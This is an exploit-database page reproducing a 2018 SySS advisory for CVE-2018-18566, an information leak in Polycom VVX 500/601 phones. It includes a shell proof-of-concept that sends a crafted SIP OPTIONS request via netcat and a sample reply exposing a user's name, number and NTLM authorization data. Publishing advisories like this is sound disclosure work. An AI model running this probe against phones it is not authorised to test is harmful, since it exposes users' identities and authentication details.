0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Author

Micha Borrmann

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

CVE

Platform

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        Information Exposure (CWE-200)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:        CVE-2018-18566
Authors of Advisory:       Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

#!/bin/sh
# Micha Borrmann <micha.borrmann@syss.de>

OWNIP=192.168.100.102

if [ -z "$1" ] 
then
    echo "Please enter an IPv4 address as target"
    exit
else
    TARGET=$1    
fi

echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060

Start the script against a phone and see the result:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2024-06-30]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Report Error

Report Error